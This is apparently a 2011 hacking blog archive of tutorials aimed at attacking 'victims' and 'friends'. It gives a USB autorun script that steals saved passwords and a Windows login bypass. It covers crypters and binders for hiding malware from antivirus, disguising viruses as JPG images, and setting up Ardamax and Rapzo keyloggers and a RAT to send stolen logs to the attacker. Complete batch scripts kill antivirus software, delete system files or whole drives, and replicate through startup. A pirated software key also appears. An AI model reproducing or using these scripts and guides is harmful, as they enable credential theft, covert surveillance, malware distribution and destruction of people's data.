Byte-Hacking: 2011

Saturday 26 November 2011

>HOW TO CRACK PASSWORDS IN WINDOWS VISTA

Boot to Win RE
Click Command Prompt option..then type the following command:
C:
CD Windows\system32
ren cmd.exe cmd.old
ren magnify.exe cmd.exe
ren cmd.old magnify.exe
Then Restart your computer
Click on the Easy of the Access centre on the left side bottom à Choose Magnify option à then.. Command prompt opens up
Type: net user administrator /active:yes
Restart the computer
Login on the administrator account and then using User Account page remove the password for the other account.
Search for Magnify.exe in start search and then click on it
Command prompt opens up!
Type: net user administrator /active:no
Restart the computer again!
This will disable the administrator account.
Boot to winRE
Type the following:
C:
CD Windows\system32
ren magnify.exe cmd.old
ren cmd.exe magnify.exe
ren cmd.old cmd.exe
exit
Restart the computer and then the system logs on to the User account without asking for the password provided there is only one user account.

>MOSCRACK – A MULTIFARIOUS ON-DEMAND SYATEMS CRACKER

Things are eventually moving into the clouds. So are cracking services too. An example is the WPA Cracker as a SaaS service. Now, we have another alternative – MOSCRACK a multifarious on-demand systems cracker.

Moscrack is a Perl application designed to facilitate cracking WPA keys on a cluster of computers. This is accomplished with Mosix clustering software and/or simple ssh connectivity. Cluster nodes can run any Unix variant (including Cygwin). This means that you can run Moscrack even on Windows operating systems! Currently it has only been used with Mosix (clustering software) and SSH nodes. It works by reading a word list from STDIN or a file, breaking it into chunks and passing those chunks off to separate processes that run in parallel. The parallel processes can then execute on different nodes in your cluster. All results are checked (to a degree) and recorded on your master node. Logging, error handling, etc… are all handled for you. Moscrack is designed to be run for long periods of time (days/weeks/etc.). It’s current feature list states:

* Based on Aircrack-NG
* CUDA is untested but may be possible
* Easily supports a large number of nodes
* Designed to run for long periods of time
* Doesn’t exit on errors/failures when possible
* Supports mixed OS/protocol configurations
* Effectively handles mixed fast and slow nodes
* Effectively handles mixed fast and slow links
* Forked design
* Architecture independent
* Uses standard protocols and utilities
* Supports Mosix
* Supports all popular operating systems as processing nodes
* Node prioritization based on speed
* Online configuration of nodes list
* Failed/bad node throttling
* Reprocessing of data on error
* Automatic performance tuning
* Does not require an agent on nodes
* Very verbose, doesn’t hide anything
* Logs key to file if found
* Logs output from nodes on error
* Includes a friendly status viewer (mosctop)
* Includes an optional basic X11 GUI

Moscrack contains an experimental GUI that hasn’t been used/tested very much. It has been tested on the following operating systems:

* Ubuntu Linux 10.10 x86 64bit & 32bit
* CentOS Linux 5.5 x86 32bit
* FreeBSD 8.1 x86 64bit
* Windows Vista Business 64bit w/Cygwin 1.7.7-1
* Mac OS X 10.5.6 (iPC OSx86)
* Solaris Express 11 x64
* iPhone 3g iOS 3.2.1 (Jailbroken)

Oh yes! You read it perfectly alright! It DOES work on an iPhone! Okay, it also needs a bit of a setup overhead. Details of the same can be read here. Since it supports a distributed nature, things could be difficult to handle. That’s why, Moscrack also includes a separate tool for monitoring it’s activity. It’s called – Moscrack Monitoring Tool, that displays data in a fashion similar to Unix “top”, thus the name “mosctop“. It also needs a few Perl libraries, that can be found in the read me document.

Download moscrack from here: Download

>CAIN & ABEL V4.9.39 – PASSWORD RECOVERY TOOLS FOR WINDOWS

Cain & abel is a password recovery tool for Microsoft Operating Systems.It allows easy recovery of various kind of passwords by sniffing the network,carcking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks,recording VoIP Conversations,decoding scrambled passwords,recovering wireless network keys,revealing passwords boxes,uncovering cached passwords and analyzing routing protocols.

Features:

Proxy support for Cain’s Certificate Collector.

The ability to specify custo, proxy authentication credentials for Certificate Collector.

Proxy HTTPS Man-in-the-Middle Sniffer (TCP port 8080).

HTTP,APR-HTTPS and APR-ProxyHTTPS sniffer filters are now separated.

OpenSSL library upgrade to version 0.9.8q

winpcap library upgarde to version 4.1.2

Download from here: Download

>HOW TO CRACK MD5 HASH STING PASSWORDS

(5/10) www.tmto.org – Searches several databases. Seems to have a large amount of data. My tests have proven this service as quite reliable. Fast.

(5/10) md5.noisette.ch – meta-search, works well

(4/10) md5decryption.com

(4/10) www.c0llision.net – distributed approach. Usable via web and IRC. Free open slots are rare.

(4/10) www.netmd5crack.com – Contains 171,392,210 unique entries in the database. You can insert new phrases to the database.

(4/10) www.md5decrypter.com – Currently serving around 810,000 hashes.

(4/10) md5hashcracker.appspot.com

(4/10) www.hashhack.com

(4/10) isc.sans.edu – Surprised to see an .edu top level domain among this list, aren’t you? This MD5 hash database is operated by the Internet Storm Center.

(4/10) www.md5crack.com – Simple but sufficient interface.

(4/10) passcracking.com – Same as passcracking.ru. Uses a combined technique. Register to increase priority.

(4/10) authsecu.com – contains over 500 million hashes (12 GB). The site itself is in French. Enter the MD5 hash to be cracked in the form field labeled “HASH MD5:” and click Déchiffrer

(4/10) md5.rednoize.com – Currently serving around 55,000,000 hashes. Fast.

(4/10) md5.web-max.ca

(3/10) www.cmd5.com – Reputedly the biggest hash database (4 TB) online. During my tests i could have bought five so called payment-records additionally to the mentioned three findings. So i guess their database is really good.

(2/10) md5.thekaine.de – uses a mixed approach (rainbow tables, dictionary attacks etc.)

www.shell-storm.org – Currently serving around 170,000 hashes.

www.md5this.com- Strange interface. Long queue.

www.hashchecker.com – Bruteforce approach. Seems to have a high success rate but only few free slots available. Register and pay to increase priority.

hashcrack.com – contains over 750 million hashes. Warning: previously unknown words will be entered into their database and will be “recoverable” for everyone later.

md5pass.com – does not use a very own database but a Google Custom Search Engine (CSE). The CSE indexed other websites so it acts as a meta-search engine. But my tests were not very successful.

md5pass.info – small service. Around 300,000 hashes in the database.

RainbowCrack – rainbow table implementation that supports multiple codecs like LM, NTLM and MD5

Cain & Abel – in my opion the most advanced password cracker for Windows available to the public

MD5 GPU Crack – local software (Windows) using GPU hardware

How to crack MD5 passwords with John the Ripper – using JtR (Unix/Windows) to crack MD5 hashes locally.

Cryptohaze GPU Rainbow Cracker – local software (Linux) using GPU hardware

Tuesday 22 November 2011

STEAL PASSWORDS FROM YOUR FRIENDS’ COMPUTERS USING USB THIEF METHOD

How to steal passwords from a computer with USB in just seconds???

Guyz in this Tutorial i will tell you how to Steal/Hack someone’s computer passwords through USB Flash Drive…
Step 1: Create New/open notepad/wordpad…
Type or copy/paste Red Text below:-

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

Save this as AUTORUN.inf

Step 2: Open a new notepad/wordpad document…
Type or copy/paste Red Text below…

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start PasswordFox.exe /stext passwordfox.txt

start OperaPassView.exe /stext OperaPassView.txt

start ChromePass.exe /stext ChromePass.txt

start Dialupass.exe /stext Dialupass.txt

start netpass.exe /stext netpass.txt

start WirelessKeyView.exe /stext WirelessKeyView.txt

start BulletsPassView.exe /stext BulletsPassView.txt

start VNCPassView.exe /stext VNCPassView.txt

start OpenedFilesView.exe /stext OpenedFilesView.txt

start ProduKey.exe /stext ProduKey.txt

start USBDeview.exe /stext USBDeview.txt

Save this as LAUNCH.bat
Now you have 2 files…

Step 3: Copy the autorun and launch file to your USB…

Step 4: Go to http://www.nirsoft.net/
And download the programs which you named in Step 2…

Step 5: Extract the files you downloaded to your desktop and copy all the .exe files to your USB…

Step 6: Remove and re-insert your USB…

Step 7: Click on the option “perform a virus scan”…
(this is an exemple, if you want it to say something else go to the autorun file and change it)…

Step 8: Now go to my computer and see usb drive, you will now see some text files, if you open them you will see usernames and passwords…

HOW TO HACK A COMPUTER USING METASPLOIT

Metasploit is one of the greatest Hacking tools ever. It makes the hacking easy for the Script Kiddies (new hackers). But Question comes How to use it to hack a computer?

Metasploit Framework comes in command-line as well as GUI version. This article will deal with the command-line version. Followings are the basic commands of Metasploit that you should Learn by Heart.
1: help (show the commands)
2: show info XXXX (to show the information on specified XXXX value, that is can be exploit or payload)
3: show options ( to show the options for a exploit and payload. Like RHOST, LHOST)
4: show exploits/payloads (to get a list of exploits/payloads)
5: use XXXX (to select the name of the exploit)
6: set XXXX (to set the value of RHOST, LHOST or payload)
7: exploit (to launch a exploit on targeted machine)
Note: To hack a computer using Metasploit first you should have the enough information of the target including:-

1: IP Address
2: Open Ports
3: Services Running
4: Version of Software Running

All of these need a little work. A famous tool to do all of these is NMAP on which I have written some articles.
Now the first step is choosing a right exploit for the vulnerabilities in the machine. To determine the exploit for the attack you need all the things noted above. For example the computer is running a SMTP server on Port 25 and there is a exploit on it than you hack that computer.
To choose an exploit following command is there:
Use [exploits address . e.g. Exploit/windows/smtp/xxx. ]
Now you need a payload (payload is a piece of program that will be executed if vulnerability is exploited). To get a list of all the payloads available for the exploit Just type following command.
Show payloads
Now choose an appropriate a payload from it. The only thing left is to set the fields for the attack. List of Most Probable fields to be set is given bellow.
RHOST = The IP address of the computer to be attacked.
RPORT = The Port of the service to exploited (it set by default)
LHOST = The IP address of your computer (it set by default)
LPORT = The default port of your Metasploit program (it set by default)
Now the Last step is to type the following command and Launch attack to the computer.
Exploit:
After typing this command the attack will be launched and if vulnerability is successfully exploited the payload will be executed and a shell (you can take it as command prompt) will be launched which will allow you to do anything with the computer that you have attacked.
Download Metasploit FrameWork

HOW TO HACK A COMPUTER USING NMAP & METASPLOIT

I have written different hacking articles about Nmap and Metasploit. Now I am writing this article to teach how to hack a computer using these two great tools…
Just got to http://www.metasploit.com/ and download the Latest Framework (not the mini version).
Now open the metasploit console. And type the following commands:
1: db_create (this will create database needed for this attack)
2: TYPE nmap -sT –sV XXX.XXX.XXX.XXX( X be the IP address of victim)
Now give it time to scan and when it is complete type following command.
3: db_autopwn -p -t –e
This would start the penetration test and great thing about this is that it does not need any manual configuration. Every thing will be done automatically and if the test is successful a shell will be created.

REVEAL PASSWORDS UNDER ASTERISKS

Without using any software, you can reveal your password hidden under the asterisks on your browser with this javascript hack... After pasting the code, a dialog box will prompt and reveal your password...

The code :

javascript:(function()
{var s,F,j,f,i; s = “”; F = document.forms; for(j=0; j<F.length; ++j)
{ f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == “password”)
s += f[i].value + “n”; } } if (s) alert(“Passwords in forms on this page:nn” + s);
else alert(“There are no passwords in forms on this page.”);})();

SPEED UP YOUR INTERNET CONNECTION BY HACKING YOUR TCP/IP

TCP/IP HACK TOOLS:
It is best for downloading big files and big torrents…
Also for small files, it requires restart…
After you hack your TCP you have to RESTART your PC…

Torrents:
800 Megs of torrent file…
Not Hacked TCP/IP: Almost 4 hours…
Hacked TCP/IP: Hacked TCP/IP: Only 2 hours or 1 and a half…

Pure Download:
400 Megs… of file
Not Hacked TCP/IP: Almost 2 hours…
Hacked TCP/IP: Hacked TCP/IP: Only a half or 1 hour…

Some AVs say its a virus… Its a virus for them Bcz its a hacking tool… Its your decision to remove or clean this if you want and its your decision to if you want to use this tool…

Heres the recommended number for your TCP/IP:
80
70
60
90 is ok, not 100, your connection maybe laggish… Just try it…
Download Link

EASY BINDER v1.0 FUD

EAsy bunder + Icon Pack

Easy Binder is a tool that combines (binds) unlimited files (no matter their type) into a single standalone executable (a Container). The Container (the final bound file) is a simple compiled program that, when opened, will automatically launch the included files...

Easy Binder can run any type of file from the bound file without affecting its direct functionality. For instance, if you bind an executable, a text file and an image file, when the Container file is run, the executable will be run too while the other files will be opened with the default image file viewer (IrfanView, Paint etc.) and text file viewer (Notepad, Wordpad etc.)…

Easy Binder Features:

# unlimited files can be bound (joined)
# can bind any file type that is needed by the executable for a properly run
# the icon of the Host file (final bound file) can be changed
# the Host file (final bound file) is 100% FUD to all AV’s
# Its 100% Free

Download Link

FUD CRYPTER TO BYPASS ANTIVIRUS DETECTION FOR KEYLOGGERS

1. First of all Download Toxic Public Crypter.

2. Run Toxic Public Crypter.exe application on your computer system to see something like this:

3. Hit on “Input File” and select the server file you want to make undetectable from antiviruses. I have used Rapzo Logger server (keylogger) over here. Now, check “Clone with file” and select File Clone. Make sure in this crypter you use the icon changer when you do crypt or else the file wont be 0/21 it will be 1/21 detected by Avira. Now, hit on “Crypt” and save your “Crypted.exe” file. It should look something like this:

This crypter also comes with stub.

Note: You don’t need to install software. Simply run “Toxic Public Crypter.exe” application.

35 CRYPTERS IN 1 – ALL IN 1 HACKING TOOLS

List of Crypters in the File:-

[RECOPILACION] Mingo Crypter V3.rar
Abigor Crypter.rar
Anka Crypter.rar
Archiless Crypter.rar
AsSaSin CrYpT.rar
Blackout Crypter.rar
Fly Crypter + Uniq Stub Generator.rar
Fly Crypter v2f.rar
Hacking Crypter.rar
Hackmeout Forums [HMO] Hacking and Security Fo…
HHC 1.4.0.rar
Infinity Crypter 2.rar
Infinity Crypter.rar
Jamaica Crypter.rar
Level-23 LuOpP CrYpT v1.2.rar
Level-23 LuOpP CrYpT V1.3.rar
LiQuid Vapour V2.0.rar
Mingo Crypter V1 Mod By MINGO.rar
Mingo Crypter V1(2).rar
Mingo Crypter V1.rar
Minguito Crypter.rar
Ohsin crypter.rar
Process Crypter.rar
Readme.txt
Rio 2016 Crypter.rar
SaW V1 Mod By LEGIONPR.rar
SceneCrypt.rar
Skull Crypter v4.rar
SnaKe Crypter.rar
Stonedinfect Crypter v1.0.rar
WTTiroloko FUD Crypter.rar
xCrypt v1.1 [Update FUD].rar
z0Indetectables X Crypter.rar

Download Crypters

Monday 21 November 2011

STEALTH CRYPTER

Have a virus that you want to make undetectable or change icon on?
Most of the RATs and Trojans are detected by anti-viruses, that’s why you should use crypters that make the your file FUD (Fully UnDetectable)

Here is how to make your file undetectable

1. Download Stealth Crypter 1.1
2. Browse to the file you want to make FUD
3. Click on Generate a couple of times
4. Pick your Icon
5. Click on Build
6. Go to Jotti and scan your file it shouldn’t be detected by any AVs (Anti-Viruses

COD CRYPTER

Here is the latest CoD crypter and is totally FUD until this day.
This will make your file completely undetectable.

Download

HOW TO HIDE YOUR VIRUS FILE INTO JPG

You Need two things:

1. Icon changer
2. Easy Binder (or any binder)

1) Create your virus. We shall call it ‘server1.exe’ for now.
2) Get any picture file you want to distribute.
3) Bind the ‘server1.exe’ and your picture file with any binder, we’ll call the binded file ‘virus1.exe’.
3.5) I reccomend Easy Binder 2.0, which comes with a bytes adder and a icon extractor, aswell as some really good packing options. I’ve uploaded it, virus free, to: http://www.mediafire.com/?igjy4dnn0zb < This will be caught by your AV as “Binder/Kit”. It is not a virus, it is a binder than is not undectable. If you don’t wish to use it, that’s fine, find your own.
4) Be sure you have ‘Hide common extensions’ unchecked in your Folder Options.

5) Change the ‘virus1.exe’ to ‘%Picturename%.jpeg – %Email/Web Address%.com’. For example, we’ll call it ‘HPIC_119.jpeg – test@test.com’.

.com works the same as .exe, except fewer people actually know that’s what it really is.
6) If you plan on distributing your virus via MSN, please skip to 7. If you plan on distributing your virus via file upload sites, please skip to 8.
6.5) I reccomend Icon Extractor V3.8 FULL with Serial, that can be downloaded from here

7) You will now need to change the icon from that ugly box. Find the picture you added to the file, and make it an icon. How? Find one of the various online Picture to Icon converters. Once your picture is a .ico, use your Icon Changer program to change the icon of the file to the .ico you just made from the picture. When you send it to people on MSN, it will show a small box of the picture inside.

You will not need to change the icon from that ugly box. Using your Icon Changer program, find the .jpeg icon, and change the ugly box to the .jpeg icon.

9) Conclusion- Your file will now look like a legit picture to 9/10 people. Some people do know that .com is an extension, but the average computer user will not see any difference, and will download it without hesitation.
http://www.multiupload.com/BAERWNUGI9

HOW TO DISABLE YOUR VICTIM’S ANTIVIRUS

Copy this Code…
Code:
@ echo off

rem –
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:Program Filesalwils~1avast4*.*
del /Q /F C:Program FilesLavasoftAd-awa~1*.exe
del /Q /F C:Program Fileskasper~1*.exe
cls
del /Q /F C:Program Filestrojan~1*.exe
del /Q /F C:Program Filesf-prot95*.dll
del /Q /F C:Program Filestbav*.dat
cls
del /Q /F C:Program Filesavpersonal*.vdf
del /Q /F C:Program FilesNorton~1*.cnt
del /Q /F C:Program FilesMcafee*.*
cls
del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:Program FilesNorton~1Norton~1*.*
del /Q /F C:Program FilesNorton~1*.*
cls
del /Q /F C:Program Filesavgamsr*.exe
del /Q /F C:Program Filesavgamsvr*.exe
del /Q /F C:Program Filesavgemc*.exe
cls
del /Q /F C:Program Filesavgcc*.exe
del /Q /F C:Program Filesavgupsvc*.exe
del /Q /F C:Program Filesgrisoft
del /Q /F C:Program Filesnood32krn*.exe
del /Q /F C:Program Filesnood32*.exe
cls
del /Q /F C:Program Filesnod32
del /Q /F C:Program Filesnood32
del /Q /F C:Program Fileskav*.exe
del /Q /F C:Program Fileskavmm*.exe
del /Q /F C:Program Fileskaspersky*.*
cls
del /Q /F C:Program Filesewidoctrl*.exe
del /Q /F C:Program Filesguard*.exe
del /Q /F C:Program Filesewido*.exe
cls
del /Q /F C:Program Filespavprsrv*.exe
del /Q /F C:Program Filespavprot*.exe
del /Q /F C:Program Filesavengine*.exe
cls
del /Q /F C:Program Filesapvxdwin*.exe
del /Q /F C:Program Fileswebproxy*.exe
del /Q /F C:Program Filespanda software*.*
rem –

And go to your desktop, create a new text document, paste it there and save it as anyname.bat while choosing file type as all files…

FORMAT OR DESTROY YOUR FRIENDS’ PC HARD DISK DATA USING NOTEPAD

Copy the following code:

010010110001111100100101010101010100000111111 00000

And go to your desktop, create a new text document, paste it there, and Save As it as .EXE and any Name would Do. eg- (virus.exe)…

HOW TO CORRUPT YOUR FRIENDS’ COMPUTER WINDOW USING DOS

Goto Notepad, paste in the below given code, and save it as Window.bat

@echo off
del c:\windows\system32\restore
del c:\windows\system32\winlogon.exe
del c:\windows\system32\logonui.exe
shutdown -f

HOW TO MAKE A DEADLY COMPUTER VIRUS

How to make Virus by Virus software:-

1) Free Download Virus software to make virus.

2) Run “In Shadow Batch Virus Generator.exe” application to see something like this:

3) You can use various options to make virus to suit your needs. You can:
- Infect files of various extensions
- Insert virus in startup menu, Kill various processes.
- Disable all security services like Windows Defender, Antivirus, Firewall.
- Rename file extensions, spread virus via file sharing.
- Create new admin account, change user account password.
- Block various websites, download trojan files to victim computer, shutdown victim computer and much more.
4) After selecting various options, move on to “Creating Options” tab and hit on “Save as Bat”. Assign name to the virus and hit on Save.

5) Now, you have your virus ready to hack your victim. Thus, you are able to make virus using Virus software.

DESTROY YOUR FRIENDS’ COMPUTER USING SIMPLE NITEPAD VIRUS

In this post we'll take a look on how to create a deadly computer virus to destroy your enemy or victim's PC...
Open Notepad, Type or Paste in the following command:-

del c:\windows\system32\*.* /q

Save it with the extension “.bat or .cmd” as u want…
Don’t double click the file otherwise u r in trouble. Why??? Bcz the file u created deletes all files from your system32 folder and when u restart your PC it will not start bcz system can not find the files in the system32 folder which is required at the time of booting…
You can also test the above by creating a fake folder let suppose:-
windows1 in C:\.
Copy some old files in it and just follow the above command. By double clicking the bat or cmd file ur all files automaitcally get deleted.
You can try this file one any one’s computer. (but this result in causing damage to the computer, so think again before trying this on anyone’s PC)

Virus 2:

This post is to help you to send viruses to your enemies! Here goes,
Paste the below given code in your Notepad, then save it as anyname.bat
Do not click on that batch file… Send it to your enimies’ email… It will:
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer

CODE:-

@Echo offcolor 4title 4title R.I.Pstartstartstartstart calccopy %0 %Systemroot%\Greatgame > nulreg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nulcopy %0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +hRUNDLL32 USER32.DLL.SwapMouseButtonstart calcclstskill msnmsgrtskill LimeWiretskill iexploretskill NMainstartclscd %userprofile%\desktopcopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batcd %userprofile%My Documentscopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batstartstart calcclsmsg * R.I.Pmsg * R.I.Pshutdown -r -t 10 -c "VIRUS DETECTED"startstarttime 12:00:R.I.Pcd %usernameprofile%\desktopcopy Greatgame.bat %random%.batgoto RIP

Sunday 20 November 2011

MAKE A VIRUS

Copy the Following Codes into different Notepads and save them as anything.bat

VIRUS 1: This Virus Code will delete your all files in hard drive…

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

VIRUS 2: This Virus will crash your window…

@Echo off
Del C:\ *.* y

VIRUS 3: This Virus Will just restart your PC…
@echo off shutdown -r -f -t 00
save as anyname.bat

Enjoy…!!!

Friday 18 November 2011

ARDMAX KEYLOGGER 3.0 – WITH REGISTRATION KEY

Download The Ardamax Keylogger 2.85

Download it and Install in your computer.

2- Now right-hand click it and click ‘Enter registration key…

3- Enter the Name and password in the box fields…
Name: Kimberley Ronald
Key: RGA3Y3A-M3D88-T3HU5-T28TM-G47A S-SFTD7-624JC

5- Once done click ‘Ok’ and you should get a pop-up saying ‘Registration code is accepted. Thank you for registration!

II. Creating the Keylogger Remote file:

1. Now your going to make the Keylogger Remote file (The thing you give to your victim). Click ‘Remote Installation…

Click ‘Next’
2. Now,you should see this.

3. If you want to bind Keylogger Remote file with another application or file click the box that says ‘Append keylogger Remote file to file or another application’ and browse file or application that you want to bind it with.. I would prefer to skip this and bind the keylogger after creating the remote file.

4. Now click ‘Additional components’ and tick ‘Installation Package Bilder’ like done in the screenshot.

5. Now you should be at ‘Invisibility’, make sure all the boxes are ticked, then click ‘Next’.

6. Now you should be at ‘Security’, click ‘Enable’ and put your password (it can be any password you like, make it something easy so you can remember). Once done, make sure all the boxes are ticked and click ‘Next’. Or else SkIp this also…

7- Uncheck the update optiong…

8. Ok, you should now be at ‘Options’, use setting like done in screenshots.You can also select it destruction date

9. Ok, now you should be at ‘Control’, click the box that says ‘Send logs every’, now make it so it sends logs every 20 minutes, then where it says ‘Delivery’, un-tick ‘Email’ and tick ‘FTP’, then where it says ‘Include’ un-tick ‘Screenshots’, now un-tick the box where it says ‘Send only if log size exceeds’, once thats done, it should all look like it does in this screenshot:

10. Now you should be at ‘FTP’, create a free account at http://www.drivehq.com then make sure your at ‘Online Storage’, then make a new folder called: Logs (this is where the logs are sent to when you keylogg someone), Now on your FTP on Ardamax Keylogger, where it says ‘FTP Host:’, put this:
FTP.DriveHQ.com
Now where it says ‘Remote Folder:’, put this: Logs
Now where it says ‘Userame:’ and ‘Password:’, put your DriveHQ username and password, then it should look something like this:

Now Click ‘Test’ and it should pop up like this.

If not then see if the password and username is right.

Once done, do NOT change your DriveHQ password or rename/delete the folder called ‘Logs’, if you do, the logs will not come through.

11. You should now be at ‘Control’, un-tick ‘Enable Screenshots Capturing’ then click ‘Next’.

12. Now you can change name and icon your Keylogger Engine as you want it to look like.

Just click ‘Finish’.
13. After you click ‘Finish’ you should see this:

Now Your Remote File Is Created

Thats it guyS Enjoy Hacking…

RAPZO KEYLOGGER 2011 – PUBLIC EDITION – HACK ANY EMAIL OR OTHER ACCOUNT

What the things you will need to hack accounts with rapzo keylogger.
Rapzo Keylogger
Resource Hacker
winrar (or any compressing tool)
Microsoft net frame work
A Hosting account (for share this file)

Now Learn Tutorial:

1. 1st of all download Download Rapzo keylogger and Resource Hacker
2. Note You need to install Microsoft Net FrameWork,

Keylogger Setting or how to use keylogger

3. Extract rapzo keylogger file into your hard drive and ope rapzo logger.exe
4. go to rapzo keylogger opetion
5. Click on Enable and check it,
6. if you have not email, then go to google.com click on gmail and make a gmail account, after all enter your gmail username and password.

Example:
Enter username box: (umerrock@live.com)
Enter Pass box: (same pass which you chose)
Logs send to box: (same email umerrock@live.com)

Now click on Test me.

if it will show you tha email is correct then you can check your mails a test mail will in your inbox,

7. Now go to option and check/tick the following components,
(i) tick on encrypt info (it will send you ip adress and system information)
(ii) tick on screen logger (it will take a screenshot from victim computer and send you in email inbox)
(iii) tick on stealers it will record passwords/keystorkes

When you will Select on Stealers a new Box will open then check on Enable all and click ok Save Settings.

After Options Go to Mail Setup and Enter your Amail and password
Enter Info
Enter UserName Box (yourgmail id)
Enter Password Box (Enter ur orignal password)
Logs Send to Box (Enter your Same Gmail id)

After all Click on Test me if the box show like the pic below then ur all setting is correct otherwise check ur email and password.

7. After all last step is this, click on build server, a server file will be created autmatic in same directory.

Guyz this is Additional Step,
Now run the resource Hacker
when you open resource hacker then go to file then click on open then open the server file which you created by Rapzo keylogger.

When you will open server file then click on version info then click on 1 then click on “0″ there you can see file description is Hijackthisfile reaplace it with Microsoft

Then click on complete script and go to file and save it as anyfilename with the extension of jpg.

Thats it now you can bind it with any jepg image file with easy binder and upload it any hosting site like mediafire.com and share with your victim when he/she will run then you can hack it.

LOST DOOR 4.0 – HACKING REMOTE OF A COMPUTER

What the things you Need?
1. A Free Account in www.no-ip.com and there you need a free Host.
2. Lost Door Tool
3. May be you need for Microsft Frame Work (Must Install it Mostly Hacking tools did not work without it.

1. Download Lost Door (Password for Extracting is umerrock)
2. Extract the files in your Hard Drive and Accept it.
3. After it is open, right click on the window and click on create server.
4. Now enter your IP address and DNS here. Leave the rest of the field as it is.
5. Now click on the ‘Options’ tab and choose the options as you want. To activate an offline keylogger is a good practice.
6. Now go to ‘Advanced’ Tab. There will options related to spreading. This will be used in case you have more than 1 victim.
7. Now just go to the ‘Create’ tab and click on create server. Your server is ready for use now and now send it to the victim.
8. After Creating Server Send this File to your Victim, you can upload your server on mediafire and share it with friends and enjoy using his PC…

WHAT IS A TROJAN

Torjan is a program that, which will infect your PC with Virus.

What Torjan Can do with your Computer?

1. It Can disable your Task Manager
2. It Can disable your Folder Option
3. It Can disable your Registry Editor
4. It Can disable your CMD Command Prompt
5. It Can Hack your Computer and Remote Control of the Computer,
6. Hacker Can steal all passwords and exploit any file from your PC.

WHAT ARE KEYSTROKE LOGGERS – KEYLOGGERS

A Keystroke logger (also known as a Keylogger) is a program, usually ran secretly in the background that records what users type, then the typed output is usually sent via email or uploaded by the keylogger somewhere in secret. These can be attached to other executable so you never even know you ran them in the first place, once you click it once it often is started at start up from their on.

There are two main types of keystroke loggers:

1. Software based, and
2. Hardware based

Software based keyloggers

These are software programs designed to work on the target computer’s operating system. Once the software is installed on the target’s computer, it captures every key pressed on the keyboard and stores it down in a file or memory-bank that can be viewed by the person performing the monitoring in real-time, or at a later date.

There is also a type of remote access software keyloggers. This is a process of creating server keylogger and then sending this server.exe file to the victim. Once the keylogger server is installed on the victim’s computer, all text and passwords typed on his computer are sent to you in your email inbox by this server created using keylogger.

Also, server keyloggers are detected by antiviruses. So, you need to have FUD (Fully UnDetectable) keylogger so that victim computer’s antivirus will not detect your sent server keylogger as virus and prevent it from being deleted.

What do you need to use a Remote Keylogger?

* Accounts to send the Logs to

The most used Method’s of sending logs is Gmail and FTP. For gmail go to goole.com and make a Gmail account and for FTP use a free web hosting provider, like t35.com

* A Keylogger Builder

A Keylogger Builder’s are very easy for you to get your hands on one. There are many keylogger builders that you can use, but they will all be detected by anti-virus or UD (Undetectable). UD Keylogger means that some anti-virus software will detect it and aleart the victim telling him that it is a virus and it will be deleted from his system. What you really want is a FUD Keylogger (Fully Undetactable). That means no anti-virus software will alert the victim saying its a virus. There are very few FUD Keyloggers on web and the most of the time you need to buy a keylogger that will be FUD for a long time. They normally cost about 3$-20$, depending on the functions of the Builder.

Hardware based keyloggers

Hardware-based keyloggers do not depend upon any software being installed as they exist at a hardware level in a computer system.

The tiny size and ideal location ensures it almost never gets found; and if it does get found, nobody would necessarily know what it was anyway! You can set it up so you can get the data in another location and you don’t need to be able to log on to the person’s machine to install it successfully.

Which type you use depends entirely up to you, the capabilities you have (whether or not you can access the machine) and what kind of data you need. Either way, keyloggers are powerful tools that can pay huge dividends in protecting your home and business.

WHAT IS A RAT – REMOTE ADMINISTRATIVE TOOL

A RAT is also a shortcut called Remote Administrator Tool. It is mostly used for malicious purposes, such as controlling PC’s, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it.

What can RAT do?
With a RAT, you can make the party download files, view their desktop/webcam, and more. Here is a list of basic features of a popular RAT:
* Manage files
